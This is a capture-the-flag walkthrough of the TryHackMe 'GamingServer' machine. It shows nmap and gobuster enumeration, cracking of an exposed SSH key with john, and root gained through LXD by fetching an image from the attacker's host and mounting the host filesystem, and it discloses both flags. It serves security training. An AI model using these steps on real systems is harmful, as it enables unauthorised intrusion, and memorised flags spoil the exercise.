GamingServer https://tryhackme.com/room/gamingserver
Task 1 Boot2Root
What is the user flag?
Let's begin by performing an nmap
scan against the target.
Copy $ nmap -sC -sV 10.10.223.2
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-16 09:38 IST
Nmap scan report for 10.10.223.2
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
| 256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_ 256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: House of danak
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.40 seconds
There are two open ports:
Let's visit the website through the browser.
Using CTRL+U
we can view the source page.
So there is a user called john
.
We can use gobuster
to find other web pages that might be useful.
Copy $ gobuster dir -u http://10.10.223.2 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.223.2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 276]
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/index.html (Status: 200) [Size: 2762]
/robots.txt (Status: 200) [Size: 33]
/secret (Status: 301) [Size: 311] [--> http://10.10.223.2/secret/]
/server-status (Status: 403) [Size: 276]
/uploads (Status: 301) [Size: 312] [--> http://10.10.223.2/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
The /secret
page seems interesting, let's go there.
Let's get the secretKey
.
It seems to be the private key of the john
user we saw before.
We can use ssh2john
to create a hash file.
Copy $ ssh2john secretKey > secretKey_hash
Now we can use john
to crack the hashes.
Copy $ john secretKey_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein (secretKey)
1g 0:00:00:00 DONE (2023-12-16 10:01) 4.347g/s 2295p/s 2295c/s 2295C/s stupid..red123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Let's change the permissions of the secretKey
.
Copy $ chmod 600 secretKey
$ ls -l
total 8
-rw------- 1 kunal kunal 1766 Dec 16 10:03 secretKey
-rw-r--r-- 1 kunal kunal 2461 Dec 16 10:00 secretKey_hash
Now we are all set to login through SSH as the john
user.
Copy $ ssh -i secretKey john@10.10.223.2
Enter passphrase for key 'secretKey':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Dec 16 04:34:22 UTC 2023
System load: 0.0 Processes: 97
Usage of /: 41.1% of 9.78GB Users logged in: 0
Memory usage: 32% IP address for eth0: 10.10.223.2
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Last login: Mon Jul 27 20:17:26 2020 from 10.8.5.10
john@exploitable:~$
We can now read the user flag.
Copy john@exploitable:~$ cat user.txt
a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e
Answer
Copy a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e
What is the root flag?
Let's check what groups john
is a part of.
Copy john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
On searching for a while we can find the following article that explains how to escalate the root privilege by exploiting the features of LXD.
Commands to be run on the attacker machine:
Copy $ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ sudo ./build-alpine
$ python3 -m http.server
Commands to be run on the target machine:
Copy john@exploitable:/tmp$ wget http://10.17.48.138:8000/alpine-v3.19-x86_64-20231216_1041.tar.gz
--2023-12-16 05:12:53-- http://10.17.48.138:8000/alpine-v3.19-x86_64-20231216_1041.tar.gz
Connecting to 10.17.48.138:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3646460 (3.5M) [application/gzip]
Saving to: ‘alpine-v3.19-x86_64-20231216_1041.tar.gz’
alpine-v3.19-x86_64-20231216_1041.tar.gz 100%[========================================================================================================================================>] 3.48M 490KB/s in 8.7s
2023-12-16 05:13:02 (410 KB/s) - ‘alpine-v3.19-x86_64-20231216_1041.tar.gz’ saved [3646460/3646460]
john@exploitable:/tmp$ lxc image import alpine-v3.19-x86_64-20231216_1041.tar.gz --alias myimage
Image imported with fingerprint: 8d217b63453d877763142d3cfdf5bb25ad94c2ef132da82eab9c314fc5f74741
john@exploitable:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | 8d217b63453d | no | alpine v3.19 (20231216_10:41) | x86_64 | 3.48MB | Dec 16, 2023 at 5:16am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
john@exploitable:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
john@exploitable:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
john@exploitable:/tmp$ lxc start ignite
john@exploitable:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
We can now locate the root.txt
file using the find
command.
Copy ~ # find / -type f -name root.txt 2>/dev/null
/mnt/root/root/root.txt
Let's get the root flag.
Copy ~ # cat /mnt/root/root/root.txt
2e337b8c9f3aff0c2b3e8d4e6a7c88fc
Answer
Copy 2e337b8c9f3aff0c2b3e8d4e6a7c88fc
Last updated 9 months ago